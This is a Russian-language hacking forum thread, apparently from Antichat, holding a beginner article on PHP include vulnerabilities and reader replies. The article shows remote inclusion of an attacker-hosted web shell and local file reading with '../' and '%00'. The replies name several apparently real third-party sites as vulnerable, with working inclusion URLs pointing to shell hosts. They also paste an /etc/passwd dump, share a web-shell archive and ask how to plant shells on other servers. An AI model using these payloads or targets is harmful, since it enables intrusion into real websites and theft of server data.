php injection
 

Дело было вечером, делать было нечего… А сидеть в мирке с укуреными было неохота как-то… Вот решил построчить немного. Знаю что подобных статей, больше чем мне дней, но все же, свое это свое.
Сразу хочу сказать, что если вы не новичок, то можете не читать далее. Else, то читаем.
Php инъекция являются, наверно, самым распространенным, после sql-inj, багом.
И так , сама суть:
Есть код:
Программист сайта видимо надеялся на то, что в мире нет плохих юзверей, которые пройдут его сайт мимо. Но зря он надеялся. Наверное, каждый из нас, как увидит ссылку типа index.php?page=shop
Сразу вместо shop пишет dsdsds и смотрит на результат.Он будет примерно таким:
Ура. Это и есть инлуд. Давайте подставим вместо dsdsds ссылку на наш сайт с шеллом, например http://hacker.nm.ru/shell (Важно! Без расширения на конце!) и о чудо, мы только что получили веб-шелл.
Идем дальше, есть код типа:
:. Получается уже локальный инлкуд… Максимум, что мы добьемся - это просмотр файлов на сервере. Можно попробывать с нулевым байтов (%00) - это сделает возможным просмотреть файлы с разрешением отличным от .htm,(пример index.php?page=../index.php%00) но… такое уже редко встречается.
Третий тип:
Кажется, что тоже все безнадежно, как и во втором случае… Но если вдуматься, что нам мешает создать на удаленном сервере папку folder с page.php в ней?
Ничего не мешает. Создаем, и уже пишем index.php?patch=http://hacker.nm.ru/
И о чудо, мы снова видим там свой шелл :

Теперь, как избежать этого.
Случай первый:
Случай второй:
Ну и третий случай(довольно редко встречается, но все же, недавно был обнаружен на одном из форумных движков…):
Ну, вот в принципе и все, теперь, если вы не умели, то научились распознавать include баги, а также защищаться от них.

_http://www.beta-bedrijvendagen.nl/main.php?file=../main.php
_http://www.compendiuminc.com/main.php?file= к примеру;)

Теперь, когда вы так много знаете, я расскажу вам как правильно кушать ложкой.

Примерно тоже самое, что и эта статья. Green_beear молодец конечно, но не туда по-мойму труд ты свой прикладываешь немного.
К новому году, по словам Егорыча великого и ужасного, будет опубликована достаточно полная статья по теме на античате, так что не делайте полуфабрикатов =)

Zadoxlik, ну простые и не очень смертные не в курсе какие планы у вас с Егорычем.. =) Инициатива приветствуется)). Думаю, здесь осуждать не имеет смысла, беспочвенно).

Статейка просто супер. Мне понравился но вот только во многих сайтах это не проходит, например я пишу в место index.php?page=shop , index.php?page=xernya а страничка вообще не реагирует на ошибочный запрос ...было бы лучше если бы вы обяснили как тогда действовать

статья нормально, так как на ачате еще не писали, пусть будет в библиотеке, но нету приложений в виде простенького кода шелла.

Тут кроме Белого Джордана об этой теме писать не могут. Ты не найдешь ни единой статьи об хсс кроме статей Алгола.

Просто об ней уже все написано

Простая статья что такого ужасного написали грин бир молодец что такого?

Ибо да, Алгола начал, а Белый Джордан закончил. Они все про хсс уже написали. Все что можно угу.

Подскажите идиоту как понять ("$page.php") - разве такое может быть?

Мдя.а вообще это не картинки, а исходники пхп. Чувак, чтобы понять это тебе наверное надо посмотреть видео на античате, уже поймешь что да как. а минусы ставят выше Members of Antichat.
http://video.antichat.ru/2_0.html

я конечно не профессор, include ($page.php) наверное page.php можно сменить на cmd,
www.vixtim.com/index.php?page.php=ls -al

или как cmd

www.vixtim.com/index.php?cmd=ls -la

вроде как разницы нет.

причем тут cmd? если в странице index.php присутствует скрипт <? passthru("$cmd"); ?>, то тогда только тебе листинг директории покажет ../index.php?cmd=ls -lia
include "$page.php" означает что при нажатии на ссылку ../index.php?page=yopt откроется страница yopt.php. В строке брaуезра ты будешь видеть ../index.php?page=yopt, хотя ее можно и открыть как ../yopt.php

Новый год прошел, а статья есть?

пардон, а не читал впереди. ответил сразу.поэтому ступил.

Вы меня неправильно поняли! Разве страница с расширением *.php вдруг стать переменной(и кавычки зачем?)? Наверное долно быть include ($page); ! Новички на этом могут голову сломать, как сломал её сегодня ночью, когда прочитал эту статью.

Статья была за долго до нового года.
Почитать пока негде нельзя

Вот все говорят, что php-include это всего лишь часть....а про остальное ни слову!

Разве это выход? если мы укажем на существующий shell проверка выполнится успешно. Вообще в таких случаях я бы рекомендовал оператор switch, надёжней не придумаешь, особенно если страниц не так много и нет необходимости их часто добавлять.

Постораюсь дать тебе ответ, коротко и чтоб ты имел маленькое представления о том что такое веб шелл.

Ну это типо проводник, но по круче =))

хм...... лан... пасиб....

BlackDog веб шелл ето скрипт чаще на PHP для управления своим\чужим сайтом\сервером.
шеллы можеш запускать на чужиш сайтах через php-ij (как ето делается я попоробовал обьясить ТУТ )
изучай!!!!
Вот скачай етот АРХИВ там подборка веб шеллов на любой вкус. Удачи

хм...вот что у меня выводится в адресную строку http://blablabla:82/?mod=lookbook

Вот код функции которая производит инклуд

$GLOBALS['g_dir_mod'] - тут папка mod

можно ли как-то сделать пхп инъекцию?

http://www.eurogym.ru/index.php?lang_id=0&content_id=+11&p_content_id=0& sitemap=0&extfilename=http://www.google.com
гы...
осваиваемся потихоньку =)

Панки, залилть вы можете расказат ькак? Я только вижу шел который работает через их инклуд, на моем сервере шел. Я хочу залить на их.

Статья прикольная. У меня вопрос вот например я увидел на форуме вот такой "php injection" - http://блаблабла/main.php?page=../../../../etc/passwd%00

Открываю и вижу: ../../../../etc/passwdroot:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lpx:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var//mail:/sbin/nologin news:x:9:13:news:/etc/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin

И еще очень много таково.
Насколько я понимаю, то мы зашли в корневую директорию сайта, перешли в папку "etc" и открыли файл "passwd". Если ошибаюсь то поправьте. Но я не понял что мы увидели в этом файле??? Разъясните пожалуйста.

Я уже отвечал на этот вопрос на форуме, вобщем применительно к локальному инклюду вот:

Не в корневую директорию сайта а сервера, в данном случае это *Nix Os (как сказал Scipio)

у меня вопрос по Web-shell.
Я использую Web-shell CIH.[ms] открываю его с помощю php-injection.
Но при попытке чтото зделать шел просто перезагружаеться и не выполняет никаких команд =( (_http://www.an-invest.ru/?id=http://poni-shell.nm.ru/sss) Можете подсказать вчем проблема ? буду очень благодарен.

Попробуй другой шелл
У меня всё нормально

Таже ситуация перепробывал кучу веб-шєлов они грузяться показывают каталог с файлами а когда я хочу загрузить или перейти в другую папку они просто перезагружаються и опять показуют тотже каталог =(

на nm.ru вроде выполняются PHP (не уверен)
вот
http://www.an-invest.ru/?id=http://ziroday.narod.ru/antichat
правда папок на запись там нет)

Я хотел бы еще сказать насчет терминологии:
все таки статья про php инклюдинг, а не про php инъекцию
php including - это подключение файлов, а
php injection - это внедрение php кода

например чтение /etc/passwd - никак не может быть инъекцией, т.к. никакого php кода не выполняется

а php injection это исполнение php комманд или кода ну допустим через eval или preg_replace т.д.

Посмотрел бы вначале, когда статья была написана.

P.S. PHP Include - это и есть PHP Injection (один из видов)

2NOmeR1 Я не думаю, что терминология со временем сильно изменилась, к тому же я не откапывал статью в недрах ачата, а ссылка на нее висела на головной странице форума

а насчет:
ну может ты и прав, но сразу вспоминается аналогия:

что ты к словам придрался. малоли кто как говорят. тут суть ясна.

Да я вобщем то не придирался, я же не пишу срочно исправьте название, или афффтар не прав, просто написал насчет терминологии, да и то для меня это непринципиально,потому что как ты сказал:

помню с Нитроксом спорил на эту темы
Вообще то инкдуинг - это именно include() или require(), ну я так считаю =)

че? какие еще линии? наркоман чтоле.

не получится у тебя в случае если урл акцес дизейблид.. тогда при меджик квоутс офф можешь локальные файлы подрубать. если же и они врублены, то тебе не повезло

Не ну я конешно еше мало чё понимаю и етого неотрицаю...
Имел ввиду я ето
если незаметил то в конце написано on line 3 (ето я и имел ввиду)
а в моём варианте 63
нашёт етого можно поподробней а тоя чето неочень понял :confused:
запрещён инклуд удалённых файлов, т.е вида (http://site/shell.php) а можно только подключать локальные (используя либо полный путь, либо отностительный) При выключенном параметре меджик квоутс кавычки не слэшируются, поэтому их можно использовать при указании полного пути подключаемого файла. Надеюсь понятно объяснил. -=lebed=-
ЗЫ попрошу неназывать мя наркаманом,ето не правда:D